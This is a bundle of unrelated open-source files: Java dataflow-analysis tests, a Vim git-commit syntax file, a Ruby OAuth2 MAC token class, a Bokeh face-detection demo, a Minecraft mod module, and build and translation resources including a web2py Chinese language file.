"WRITE(j, 1) -> [* {j = 1}]",
"1: STMT -> [* T]",
"READ(j) -> [* T]",
"GOTO -> [* T]",
"2: END");
analyze("int", "int j = 0; if (foo() == 1) j = foo(); return j;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(j, 0) -> [* {j = 0}]",
"STMT -> [* {j = 0}]",
"OPTTHROW(foo()) -> [NOTHROW=* {j = 0}, RE=2 {j = 0}, E=2 {j = 0}]",
"CALL(foo) -> [* {j = 0}]",
"COND (EntryPoint.foo() == 1) -> [THEN=* {j = 0}, ELSE=1 {j = 0}]",
"STMT -> [* {j = 0}]",
"OPTTHROW(foo()) -> [NOTHROW=* {j = 0}, RE=2 {j = 0}, E=2 {j = 0}]",
"CALL(foo) -> [* {j = 0}]",
"WRITE(j, EntryPoint.foo()) -> [* T]",
"1: STMT -> [* T]",
"READ(j) -> [* T]",
"GOTO -> [* T]",
"2: END");
}
public void testWhileLoop1() throws Exception {
analyze("void", "int j = 1; while (j > 0) ++j;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(j, 1) -> [* {j = 1}]",
"STMT -> [* {j = 1}]",
"1: READ(j) -> [* T]",
"COND (j > 0) -> [THEN=* T, ELSE=2 T]",
"STMT -> [* T]",
"READWRITE(j, null) -> [1 T]",
"2: END");
}
public void testWhileLoop2() throws Exception {
analyze("void", "int j = 0; while (j > 0) {};").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(j, 0) -> [* {j = 0}]",
"STMT -> [* {j = 0}]",
"1: READ(j) -> [* {j = 0}]",
"COND (j > 0) -> [THEN=* {j = 0}, ELSE=2 {j = 0}]",
"BLOCK -> [1 {j = 0}]",
"2: END");
}
public void testConditionalExpressions() throws Exception {
analyze("void", "boolean b1 = false; boolean b2 = false; if (b1 && (b2 = true)) b1 = true;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(b1, false) -> [* {b1 = false}]",
"STMT -> [* {b1 = false}]",
"WRITE(b2, false) -> [* {b1 = false, b2 = false}]",
"STMT -> [* {b1 = false, b2 = false}]",
"READ(b1) -> [* {b1 = false, b2 = false}]",
"COND (b1) -> [THEN=* {b1 = false, b2 = false}, ELSE=1 {b1 = false, b2 = false}]",
"WRITE(b2, true) -> [* {b1 = false, b2 = true}]",
"1: COND (b1 && (b2 = true)) -> [THEN=* {b1 = false}, ELSE=2 {b1 = false}]",
"STMT -> [* {b1 = false}]",
"WRITE(b1, true) -> [* {b1 = true}]",
"2: END");
}
// Various real-world stuff
public void testVariousStuff() throws Exception {
addSnippetClassDecl("static Object f = null;");
analyze("void",
"Object e = null;" +
"if (f != null) if (e == null)" +
" return;" +
"boolean b = e == null;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(e, null) -> [* {e = null}]",
"STMT -> [* {e = null}]",
"READ(f) -> [* {e = null}]",
"COND (EntryPoint.f != null) -> [THEN=* {e = null}, ELSE=1 {e = null}]",
"STMT -> [* {e = null}]",
"READ(e) -> [* {e = null}]",
"COND (e == null) -> [THEN=* {e = null}, ELSE=1 {e = null}]",
"STMT -> [* {e = null}]",
"GOTO -> [2 {e = null}]",
"1: STMT -> [* {e = null}]",
"READ(e) -> [* {e = null}]",
"WRITE(b, e == null) -> [* {b = true, e = null}]",
"2: END"
);
}
/**
* Parameters should have an initial assumption of non-constant.
*/
public void testParamNonConstant() throws Exception {
analyzeWithParams("void", "int i, int j", "if (j == 0) { i = 0; } j=i; j=0;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"READ(j) -> [* T]",
"COND (j == 0) -> [THEN=* {j = 0}, ELSE=1 T]",
"BLOCK -> [* {j = 0}]",
"STMT -> [* {j = 0}]",
"WRITE(i, 0) -> [* {i = 0, j = 0}]",
"1: STMT -> [* T]",
"READ(i) -> [* T]",
"WRITE(j, i) -> [* T]",
"STMT -> [* T]",
"WRITE(j, 0) -> [* {j = 0}]",
"END"
);
}
@Override
protected Analysis<CfgNode<?>, CfgEdge, Cfg, ConstantsAssumption> createAnalysis() {
return new ConstantsAnalysis();
}
}
| {
"pile_set_name": "Github"
} |
" Vim syntax file
" Language: git commit file
" Maintainer: Tim Pope <[email protected]>
" Filenames: *.git/COMMIT_EDITMSG
" Last Change: 2013 May 30
if exists("b:current_syntax")
finish
endif
syn case match
syn sync minlines=50
if has("spell")
syn spell toplevel
endif
syn include @gitcommitDiff syntax/diff.vim
syn region gitcommitDiff start=/\%(^diff --\%(git\|cc\|combined\) \)\@=/ end=/^\%(diff --\|$\|#\)\@=/ fold contains=@gitcommitDiff
syn match gitcommitFirstLine "\%^[^#].*" nextgroup=gitcommitBlank skipnl
syn match gitcommitSummary "^.\{0,50\}" contained containedin=gitcommitFirstLine nextgroup=gitcommitOverflow contains=@Spell
syn match gitcommitOverflow ".*" contained contains=@Spell
syn match gitcommitBlank "^[^#].*" contained contains=@Spell
syn match gitcommitComment "^#.*"
syn match gitcommitHead "^\%(# .*\n\)\+#$" contained transparent
syn match gitcommitOnBranch "\%(^# \)\@<=On branch" contained containedin=gitcommitComment nextgroup=gitcommitBranch skipwhite
syn match gitcommitOnBranch "\%(^# \)\@<=Your branch .\{-\} '" contained containedin=gitcommitComment nextgroup=gitcommitBranch skipwhite
syn match gitcommitBranch "[^ ']\+" contained
syn match gitcommitNoBranch "\%(^# \)\@<=Not currently on any branch." contained containedin=gitcommitComment
syn match gitcommitHeader "\%(^# \)\@<=.*:$" contained containedin=gitcommitComment
syn region gitcommitAuthor matchgroup=gitCommitHeader start=/\%(^# \)\@<=\%(Author\|Committer\):/ end=/$/ keepend oneline contained containedin=gitcommitComment transparent
syn match gitcommitNoChanges "\%(^# \)\@<=No changes$" contained containedin=gitcommitComment
syn region gitcommitUntracked start=/^# Untracked files:/ end=/^#$\|^#\@!/ contains=gitcommitHeader,gitcommitHead,gitcommitUntrackedFile fold
syn match gitcommitUntrackedFile "\t\@<=.*" contained
syn region gitcommitDiscarded start=/^# Change\%(s not staged for commit\|d but not updated\):/ end=/^#$\|^#\@!/ contains=gitcommitHeader,gitcommitHead,gitcommitDiscardedType fold
syn region gitcommitSelected start=/^# Changes to be committed:/ end=/^#$\|^#\@!/ contains=gitcommitHeader,gitcommitHead,gitcommitSelectedType fold
syn region gitcommitUnmerged start=/^# Unmerged paths:/ end=/^#$\|^#\@!/ contains=gitcommitHeader,gitcommitHead,gitcommitUnmergedType fold
syn match gitcommitDiscardedType "\t\@<=[a-z][a-z ]*[a-z]: "he=e-2 contained containedin=gitcommitComment nextgroup=gitcommitDiscardedFile skipwhite
syn match gitcommitSelectedType "\t\@<=[a-z][a-z ]*[a-z]: "he=e-2 contained containedin=gitcommitComment nextgroup=gitcommitSelectedFile skipwhite
syn match gitcommitUnmergedType "\t\@<=[a-z][a-z ]*[a-z]: "he=e-2 contained containedin=gitcommitComment nextgroup=gitcommitUnmergedFile skipwhite
syn match gitcommitDiscardedFile ".\{-\}\%($\| -> \)\@=" contained nextgroup=gitcommitDiscardedArrow
syn match gitcommitSelectedFile ".\{-\}\%($\| -> \)\@=" contained nextgroup=gitcommitSelectedArrow
syn match gitcommitUnmergedFile ".\{-\}\%($\| -> \)\@=" contained nextgroup=gitcommitSelectedArrow
syn match gitcommitDiscardedArrow " -> " contained nextgroup=gitcommitDiscardedFile
syn match gitcommitSelectedArrow " -> " contained nextgroup=gitcommitSelectedFile
syn match gitcommitUnmergedArrow " -> " contained nextgroup=gitcommitSelectedFile
syn match gitcommitWarning "\%^[^#].*: needs merge$" nextgroup=gitcommitWarning skipnl
syn match gitcommitWarning "^[^#].*: needs merge$" nextgroup=gitcommitWarning skipnl contained
syn match gitcommitWarning "^\%(no changes added to commit\|nothing \%(added \)\=to commit\)\>.*\%$"
hi def link gitcommitSummary Keyword
hi def link gitcommitComment Comment
hi def link gitcommitUntracked gitcommitComment
hi def link gitcommitDiscarded gitcommitComment
hi def link gitcommitSelected gitcommitComment
hi def link gitcommitUnmerged gitcommitComment
hi def link gitcommitOnBranch Comment
hi def link gitcommitBranch Special
hi def link gitcommitNoBranch gitCommitBranch
hi def link gitcommitDiscardedType gitcommitType
hi def link gitcommitSelectedType gitcommitType
hi def link gitcommitUnmergedType gitcommitType
hi def link gitcommitType Type
hi def link gitcommitNoChanges gitcommitHeader
hi def link gitcommitHeader PreProc
hi def link gitcommitUntrackedFile gitcommitFile
hi def link gitcommitDiscardedFile gitcommitFile
hi def link gitcommitSelectedFile gitcommitFile
hi def link gitcommitUnmergedFile gitcommitFile
hi def link gitcommitFile Constant
hi def link gitcommitDiscardedArrow gitcommitArrow
hi def link gitcommitSelectedArrow gitcommitArrow
hi def link gitcommitUnmergedArrow gitcommitArrow
hi def link gitcommitArrow gitcommitComment
"hi def link gitcommitOverflow Error
hi def link gitcommitBlank Error
let b:current_syntax = "gitcommit"
| {
"pile_set_name": "Github"
} |
module Rack
module OAuth2
class AccessToken
class MAC < AccessToken
attr_required :mac_key, :mac_algorithm
attr_optional :ts, :ext_verifier, :ts_expires_in
attr_reader :nonce, :signature, :ext
def initialize(attributes = {})
super(attributes)
@issued_at = Time.now.utc
@ts_expires_in ||= 5.minutes
end
def token_response
super.merge(
mac_key: mac_key,
mac_algorithm: mac_algorithm
)
end
def verify!(request)
if self.ext_verifier.present?
body = request.body.read
request.body.rewind # for future use
self.ext_verifier.new(
raw_body: body,
algorithm: self.mac_algorithm
).verify!(request.ext)
end
now = Time.now.utc.to_i
now = @ts.to_i if @ts.present?
raise Rack::OAuth2::AccessToken::MAC::Verifier::VerificationFailed.new("Request ts expired") if now - request.ts.to_i > @ts_expires_in.to_i
Signature.new(
secret: self.mac_key,
algorithm: self.mac_algorithm,
nonce: request.nonce,
method: request.request_method,
request_uri: request.fullpath,
host: request.host,
port: request.port,
ts: request.ts,
ext: request.ext
).verify!(request.signature)
rescue Verifier::VerificationFailed => e
request.invalid_token! e.message
end
def authenticate(request)
@nonce = generate_nonce
@ts_generated = @ts || Time.now.utc
if self.ext_verifier.present?
@ext = self.ext_verifier.new(
raw_body: request.body,
algorithm: self.mac_algorithm
).calculate
end
@signature = Signature.new(
secret: self.mac_key,
algorithm: self.mac_algorithm,
nonce: self.nonce,
method: request.header.request_method,
request_uri: request.header.create_query_uri,
host: request.header.request_uri.host,
port: request.header.request_uri.port,
ts: @ts_generated,
ext: @ext
).calculate
request.header['Authorization'] = authorization_header
end
private
def authorization_header
header = "MAC id=\"#{access_token}\""
header << ", nonce=\"#{nonce}\""
header << ", ts=\"#{@ts_generated.to_i}\""
header << ", mac=\"#{signature}\""
header << ", ext=\"#{ext}\"" if @ext.present?
header
end
def generate_nonce
[
(Time.now.utc - @issued_at).to_i,
SecureRandom.hex
].join(':')
end
end
end
end
end
require 'rack/oauth2/access_token/mac/verifier'
require 'rack/oauth2/access_token/mac/sha256_hex_verifier'
require 'rack/oauth2/access_token/mac/signature'
| {
"pile_set_name": "Github"
} |
from datetime import datetime as dt
import cv2
from bokeh.io import curdoc
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.sampledata.haar_cascade import frontalface_default_path
CAMERA_WIDTH, CAMERA_HEIGHT = (1280, 780)
# try an external camera device first, fall back to default camera
video_capture = cv2.VideoCapture(1)
if not video_capture.isOpened():
video_capture = cv2.VideoCapture(0)
video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, CAMERA_WIDTH)
video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, CAMERA_HEIGHT)
# train our cascade classifier
face_cascade = cv2.CascadeClassifier(frontalface_default_path)
img_plot = figure(plot_width=CAMERA_WIDTH//2, plot_height=CAMERA_HEIGHT//2,
x_range=(0, CAMERA_WIDTH), y_range=(0, CAMERA_HEIGHT),
x_axis_type=None, y_axis_type=None,
tools="", toolbar_location=None, name="image")
image_source = ColumnDataSource(dict(image=[]))
img_plot.image_rgba('image', x=0, y=0, dw=CAMERA_WIDTH, dh=CAMERA_HEIGHT,
source=image_source)
rect_source = ColumnDataSource(dict(x=[], y=[], w=[], h=[]))
img_plot.rect('x', 'y', width='w', height='h', source=rect_source,
fill_color=None, line_color="#fffdd0", line_width=4)
ts_plot = figure(plot_width=CAMERA_WIDTH//2, plot_height=150,
tools="", toolbar_location=None, name="ts")
ts_plot.y_range.start = 0
ts_plot.y_range.min_interval = 2
step_source = ColumnDataSource(dict(t=[], n=[]))
ts_plot.step('t', 'n', source=step_source, line_color="#fffdd0")
t0 = dt.now()
empty_rects = dict(x=[], y=[], w=[], h=[])
def update():
ret, frame = video_capture.read()
if not ret: return
faces_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(faces_frame,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30))
img_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
img_frame = img_frame.view(dtype="uint32").reshape(frame.shape[:2])
img_frame = img_frame[::-2, ::2] # lightly decimate and invert for plotting
if len(faces) == 0:
rect_source.data = empty_rects
else:
# the faces rects origin is top left so we need to fix up
faces = [(x+w/2, CAMERA_HEIGHT-y-h/2, w, h) for x, y, w, h in faces]
rect_source.data = dict(zip(('x', 'y', 'w', 'h'), zip(*faces)))
image_source.data["image"] = [img_frame]
step_source.stream({
't': [(dt.now() - t0).total_seconds() * 1000],
'n': [len(faces)]
}, rollover=200)
curdoc().add_root(img_plot)
curdoc().add_root(ts_plot)
curdoc().add_periodic_callback(update, 100)
curdoc().title = "Face Detection"
| {
"pile_set_name": "Github"
} |
{
"signature": "A personal identifier to accompany your transaction",
"tx-speed-pt-1": "This field regulates speed of transaction, which is always paid in {0}.",
"tx-speed-pt-2": "We recommend having at least .01 {0} before making transactions.",
"print": "Print",
"addr-switch": "Switch Address",
"addr-qr": "Address in QR code",
"addr-display": "Display Address on your device",
"password": "This password encrypts your private key. This does not act as a seed to generate your keys.",
"nonce": "This refers to the number of the transaction you are making. If you have never made a transaction before, this will be 0. Add +1 for each transaction you make. Reference an ETH blockchain explorer if you do not know your current nonce.",
"gas-limit": "This refers to the maximum allowance of gas you will give for a transaction. All excess gas will be refunded from successful transactions. This field should autogenerate based on network congestion."
}
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright (c) 2006, 2008 IBM Corporation and others.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* IBM Corporation - initial API and implementation
*******************************************************************************/
package org.eclipse.wst.jsdt.internal.corext.refactoring.changes;
import org.eclipse.core.runtime.Assert;
import org.eclipse.ltk.core.refactoring.Change;
import org.eclipse.ltk.core.refactoring.ChangeDescriptor;
import org.eclipse.ltk.core.refactoring.CompositeChange;
import org.eclipse.ltk.core.refactoring.RefactoringChangeDescriptor;
import org.eclipse.ltk.core.refactoring.RefactoringDescriptor;
/**
* Composite change with an associated refactoring descriptor.
*
*
*/
public final class RefactoringDescriptorChange extends CompositeChange {
/** The refactoring descriptor */
private RefactoringDescriptor fDescriptor;
/**
* Creates a new refactoring descriptor change.
*
* @param descriptor
* the refactoring descriptor
* @param name
* the name
*/
public RefactoringDescriptorChange(final RefactoringDescriptor descriptor, final String name) {
super(name);
Assert.isNotNull(descriptor);
fDescriptor= descriptor;
}
/**
* Creates a new refactoring descriptor change.
*
* @param descriptor
* the refactoring descriptor
* @param name
* the name
* @param changes
* the changes
*/
public RefactoringDescriptorChange(final RefactoringDescriptor descriptor, final String name, final Change[] changes) {
super(name, changes);
Assert.isNotNull(descriptor);
fDescriptor= descriptor;
}
/**
* {@inheritDoc}
*/
public ChangeDescriptor getDescriptor() {
return new RefactoringChangeDescriptor(fDescriptor);
}
}
| {
"pile_set_name": "Github"
} |
package vazkii.quark.world.module;
import java.util.HashMap;
import java.util.Map;
import com.google.common.base.Functions;
import net.minecraft.block.ComposterBlock;
import net.minecraft.block.material.MaterialColor;
import net.minecraft.item.Items;
import net.minecraft.world.gen.GenerationStage.Decoration;
import net.minecraftforge.common.BiomeDictionary;
import vazkii.quark.base.handler.VariantHandler;
import vazkii.quark.base.module.Config;
import vazkii.quark.base.module.LoadModule;
import vazkii.quark.base.module.Module;
import vazkii.quark.base.module.ModuleCategory;
import vazkii.quark.base.world.WorldGenHandler;
import vazkii.quark.base.world.WorldGenWeights;
import vazkii.quark.world.block.BlossomLeavesBlock;
import vazkii.quark.world.block.BlossomSaplingBlock;
import vazkii.quark.world.block.BlossomSaplingBlock.BlossomTree;
import vazkii.quark.world.config.BlossomTreeConfig;
import vazkii.quark.world.gen.BlossomTreeGenerator;
@LoadModule(category = ModuleCategory.WORLD)
public class BlossomTreesModule extends Module {
@Config BlossomTreeConfig blue = new BlossomTreeConfig(200, BiomeDictionary.Type.COLD);
@Config BlossomTreeConfig lavender = new BlossomTreeConfig(100, BiomeDictionary.Type.SWAMP);
@Config BlossomTreeConfig orange = new BlossomTreeConfig(100, BiomeDictionary.Type.SAVANNA);
@Config BlossomTreeConfig pink = new BlossomTreeConfig(100, BiomeDictionary.Type.MOUNTAIN);
@Config BlossomTreeConfig yellow = new BlossomTreeConfig(200, BiomeDictionary.Type.PLAINS);
public static Map<BlossomTree, BlossomTreeConfig> trees = new HashMap<>();
@Override
public void construct() {
add("blue", MaterialColor.LIGHT_BLUE, blue);
add("lavender", MaterialColor.PINK, lavender);
add("orange", MaterialColor.ORANGE_TERRACOTTA, orange);
add("pink", MaterialColor.PINK, pink);
add("yellow", MaterialColor.YELLOW, yellow);
}
@Override
public void setup() {
trees.forEach((tree, config) -> {
ComposterBlock.CHANCES.put(tree.leaf.getBlock().asItem(), 0.3F);
ComposterBlock.CHANCES.put(tree.sapling.asItem(), 0.3F);
WorldGenHandler.addGenerator(this, new BlossomTreeGenerator(config, tree), Decoration.TOP_LAYER_MODIFICATION, WorldGenWeights.BLOSSOM_TREES);
});
}
private void add(String colorName, MaterialColor color, BlossomTreeConfig config) {
BlossomLeavesBlock leaves = new BlossomLeavesBlock(colorName, this, color);
BlossomTree tree = new BlossomTree(leaves);
BlossomSaplingBlock sapling = new BlossomSaplingBlock(colorName, this, tree, leaves);
VariantHandler.addFlowerPot(sapling, sapling.getRegistryName().getPath(), Functions.identity());
trees.put(tree, config);
}
}
| {
"pile_set_name": "Github"
} |
# a simple C only test case
cmake_minimum_required (VERSION 2.6)
project (CompileCommandOutput CXX)
set(CMAKE_EXPORT_COMPILE_COMMANDS ON)
set(CMAKE_DEBUG_POSTFIX "_test_debug_postfix")
if(MAKE_SUPPORTS_SPACES)
set(test1_srcs "file with spaces.cxx")
else()
set(test1_srcs "file_with_underscores.cxx")
endif()
add_library(test1 STATIC ${test1_srcs})
add_library(test2 SHARED "../CompileCommandOutput/relative.cxx")
include_directories(${CompileCommandOutput_SOURCE_DIR}/../../Source)
add_executable(CompileCommandOutput compile_command_output.cxx)
target_link_libraries(CompileCommandOutput test1 test2)
| {
"pile_set_name": "Github"
} |
<resources>
<!-- Example customization of dimensions originally defined in res/values/dimens.xml
(such as screen margins) for screens with more than 820dp of available width. This
would include 7" and 10" devices in landscape (~960dp and ~1280dp respectively). -->
<dimen name="activity_horizontal_margin">64dp</dimen>
</resources>
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
{
'!langcode!': 'zh-cn',
'!langname!': '中文',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" 应为选择表达式, 格式如 "field1=\'value\'". 但是对 JOIN 的结果不可以使用 update 或者 delete"',
'%s %%{row} deleted': '已删除 %s 笔',
'%s %%{row} updated': '已更新 %s 笔',
'%s selected': '%s 已选择',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(**%.0d MB**)': '(**%.0d MB**)',
'(something like "it-it")': '(格式类似 "zh-tw")',
'**%(items)s** %%{item(items)}, **%(bytes)s** %%{byte(bytes)}': '**%(items)s** %%{item(items)}, **%(bytes)s** %%{byte(bytes)}',
'**%(items)s** items, **%(bytes)s** %%{byte(bytes)}': '**%(items)s** items, **%(bytes)s** %%{byte(bytes)}',
'**not available** (requires the Python [[guppy http://pypi.python.org/pypi/guppy/ popup]] library)': '**not available** (requires the Python [[guppy http://pypi.python.org/pypi/guppy/ popup]] library)',
'?': '?',
'``**not available**``:red (requires the Python [[guppy http://pypi.python.org/pypi/guppy/ popup]] library)': '``**not available**``:red (requires the Python [[guppy http://pypi.python.org/pypi/guppy/ popup]] library)',
'A new version of web2py is available': '新版 web2py 已推出',
'A new version of web2py is available: %s': '新版 web2py 已推出: %s',
'about': '关于',
'About': '关于',
'About application': '关于本应用程序',
'Access Control': 'Access Control',
'admin': 'admin',
'Admin is disabled because insecure channel': '管理功能(Admin)在非安全连接环境下自动关闭',
'Admin is disabled because unsecure channel': '管理功能(Admin)在非安全连接环境下自动关闭',
'Administrative Interface': 'Administrative Interface',
'Administrative interface': '点击进入管理界面',
'Administrator Password:': '管理员密码:',
'Ajax Recipes': 'Ajax Recipes',
'An error occured, please %s the page': 'An error occured, please %s the page',
'An error occured, please [[reload %s]] the page': 'An error occured, please [[reload %s]] the page',
'appadmin is disabled because insecure channel': '管理界面在非安全通道下被禁用',
'Are you sure you want to delete file "%s"?': '确定要删除文件"%s"?',
'Are you sure you want to delete this object?': '确定要删除该对象么?',
'Are you sure you want to uninstall application "%s"': '确定要删除应用程序 "%s"',
'Are you sure you want to uninstall application "%s"?': '确定要删除应用程序 "%s"',
'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.': '注意: 登录管理账号需要安全连接(HTTPS)或是在本地连接(localhost).',
'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.': '注意: 因为在测试模式不保证多线程安全性,所以不可同时执行多个测试案例',
'ATTENTION: you cannot edit the running application!': '注意:不可编辑正在执行的应用程序!',
'Authentication': '验证',
'Available Databases and Tables': '可提供的数据库和数据表',
'Buy this book': '购买本书',
"Buy web2py's book": "Buy web2py's book",
'cache': '高速缓存',
'Cache': 'Cache',
'Cache Cleared': 'Cache Cleared',
'Cache contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.': 'Cache contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.',
'Cache Keys': 'Cache Keys',
'Cannot be empty': '不可空白',
'Cannot compile: there are errors in your app. Debug it, correct errors and try again.': '编译失败:应用程序有错误,请排除错误后再尝试编译.',
'Change Password': '修改密码',
'change password': '修改密码',
'Check to delete': '打勾以示删除',
'Check to delete:': '打勾以示删除:',
'Clear CACHE?': 'Clear CACHE?',
'Clear DISK': 'Clear DISK',
'Clear RAM': 'Clear RAM',
'Client IP': '客户端网址(IP)',
'Community': 'Community',
'Components and Plugins': 'Components and Plugins',
'Config.ini': 'Config.ini',
'Controller': '控件',
'Controllers': '控件',
'Copyright': '版权所有',
'Create new application': '创建应用程序',
'Created By': 'Created By',
'Created On': 'Created On',
'Current request': '当前网络要求(request)',
'Current response': '当前网络响应(response)',
'Current session': '当前网络连接信息(session)',
'customize me!': '请调整我!',
'data uploaded': '数据已上传',
'Database': '数据库',
'Database %s select': '已选择 %s 数据库',
'Database Administration (appadmin)': 'Database Administration (appadmin)',
'Date and Time': '日期和时间',
'db': 'db',
'DB Model': '数据库模型',
'Delete': '删除',
'Delete:': '删除:',
'Demo': 'Demo',
'Deploy on Google App Engine': '发布到 Google App Engine',
'Deployment Recipes': 'Deployment Recipes',
'Description': '描述',
'DESIGN': '设计',
'Design': 'Design',
'design': '设计',
'Design for': '设计用于',
'DISK': 'DISK',
'Disk Cache Keys': 'Disk Cache Keys',
'Disk Cleared': 'Disk Cleared',
'DISK contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.': 'DISK contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.',
'Documentation': 'Documentation',
"Don't know what to do?": "Don't know what to do?",
'done!': '完成!',
'Download': '下载',
'E-mail': '电子邮件',
'EDIT': '编辑',
'Edit': '编辑',
'Edit application': '编辑应用程序',
'Edit current record': '编辑当前记录',
'edit profile': '编辑配置文件',
'Edit Profile': '编辑配置文件',
'Edit This App': '编辑本应用程序',
'Editing file': '编辑文件',
'Editing file "%s"': '编辑文件"%s"',
'Email and SMS': 'Email and SMS',
'enter an integer between %(min)g and %(max)g': 'enter an integer between %(min)g and %(max)g',
'Error logs for "%(app)s"': '"%(app)s"的错误记录',
'Errors': 'Errors',
'export as csv file': '以CSV格式导出',
'FAQ': 'FAQ',
'First name': '名',
'Forgot username?': '忘记用户名?',
'Forms and Validators': 'Forms and Validators',
'Free Applications': 'Free Applications',
'Functions with no doctests will result in [passed] tests.': '沒有 doctests 的函数会显示 [passed].',
'Graph Model': 'Graph Model',
'Group ID': '群组编号',
'Groups': 'Groups',
'Hello World': 'Hello World',
'Helping web2py': 'Helping web2py',
'Hit Ratio: **%(ratio)s%%** (**%(hits)s** %%{hit(hits)} and **%(misses)s** %%{miss(misses)})': 'Hit Ratio: **%(ratio)s%%** (**%(hits)s** %%{hit(hits)} and **%(misses)s** %%{miss(misses)})',
'Home': 'Home',
'How did you get here?': 'How did you get here?',
'import': 'import',
'Import/Export': '导入/导出',
'Index': '索引',
'insert new': '插入新纪录',
'insert new %s': '插入新纪录 %s',
'Installed applications': '已安裝应用程序',
'Internal State': '內部状态',
'Introduction': 'Introduction',
'Invalid action': '非法操作(action)',
'Invalid email': '不符合电子邮件格式',
'Invalid Query': '无效的查询请求',
'invalid request': '网络要求无效',
'Is Active': 'Is Active',
'Key': 'Key',
'Language files (static strings) updated': '语言文件已更新',
'Languages': '各国语言',
'Last name': '姓',
'Last saved on:': '最后保存时间:',
'Layout': '网页布局',
'Layout Plugins': 'Layout Plugins',
'Layouts': 'Layouts',
'License for': '软件授权',
'Live Chat': 'Live Chat',
'Log In': 'Log In',
'login': '登录',
'Login': '登录',
'Login to the Administrative Interface': '登录到管理员界面',
'logout': '登出',
'Logout': '登出',
'Lost Password': '忘记密码',
'Lost password?': '忘记密码?',
'Main Menu': '主菜单',
'Manage %(action)s': 'Manage %(action)s',
'Manage Access Control': 'Manage Access Control',
'Manage Cache': 'Manage Cache',
'Memberships': 'Memberships',
'Menu Model': '菜单模型(menu)',
'Models': '数据模型',
'Modified By': '修改者',
'Modified On': '修改时间',
'Modules': '程序模块',
'My Sites': 'My Sites',
'Name': '名字',
'New Record': '新记录',
'new record inserted': '已插入新记录',
'next %s rows': 'next %s rows',
'next 100 rows': '往后 100 笔',
'NO': '否',
'No databases in this application': '该应用程序不含数据库',
'Number of entries: **%s**': 'Number of entries: **%s**',
'Object or table name': 'Object or table name',
'Online book': 'Online book',
'Online examples': '点击进入在线例子',
'or import from csv file': '或导入CSV文件',
'Origin': '原文',
'Original/Translation': '原文/翻译',
'Other Plugins': 'Other Plugins',
'Other Recipes': 'Other Recipes',
'Overview': '概览',
'Password': '密码',
"Password fields don't match": '密码不匹配',
'Peeking at file': '选择文件',
'Permission': 'Permission',
'Permissions': 'Permissions',
'Plugins': 'Plugins',
'Powered by': '基于下列技术构建:',
'Preface': 'Preface',
'previous %s rows': 'previous %s rows',
'previous 100 rows': '往前 100 笔',
'pygraphviz library not found': 'pygraphviz library not found',
'Python': 'Python',
'Query:': '查询:',
'Quick Examples': 'Quick Examples',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram Cleared',
'RAM contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.': 'RAM contains items up to **%(hours)02d** %%{hour(hours)} **%(min)02d** %%{minute(min)} **%(sec)02d** %%{second(sec)} old.',
'Recipes': 'Recipes',
'Record': '记录',
'record does not exist': '记录不存在',
'Record ID': '记录编号',
'Record id': '记录编号',
'Register': '注册',
'register': '注册',
'Registration identifier': 'Registration identifier',
'Registration key': '注册密钥',
'reload': 'reload',
'Remember me (for 30 days)': '记住我(30 天)',
'Reset Password key': '重置密码',
'Resolve Conflict file': '解决冲突文件',
'Role': '角色',
'Roles': 'Roles',
'Rows in Table': '在数据表里的记录',
'Rows selected': '笔记录被选择',
'Save model as...': 'Save model as...',
'Saved file hash:': '已保存文件的哈希值:',
'Semantic': 'Semantic',
'Services': 'Services',
'Sign Up': 'Sign Up',
'Size of cache:': 'Size of cache:',
'state': '状态',
'Static files': '静态文件',
'Statistics': '统计数据',
'Stylesheet': '网页样式表',
'submit': '提交',
'Submit': '提交',
'Support': 'Support',
'Sure you want to delete this object?': '确定要删除此对象?',
'Table': '数据表',
'Table name': '数据表名称',
'Testing application': '测试中的应用程序',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': '"query"应是类似 "db.table1.field1==\'value\'" 的条件表达式. "db.table1.field1==db.table2.field2"的形式则代表执行 JOIN SQL.',
'The Core': 'The Core',
'The output of the file is a dictionary that was rendered by the view %s': 'The output of the file is a dictionary that was rendered by the view %s',
'The Views': '视图',
'There are no controllers': '沒有控件(controllers)',
'There are no models': '沒有数据库模型(models)',
'There are no modules': '沒有程序模块(modules)',
'There are no static files': '沒有静态文件',
'There are no translators, only default language is supported': '沒有对应的语言文件,仅支持原始语言',
'There are no views': '沒有视图',
'This App': '该应用',
'This is the %(filename)s template': '这是%(filename)s文件的模板(template)',
'Ticket': '问题清单',
'Time in Cache (h:m:s)': 'Time in Cache (h:m:s)',
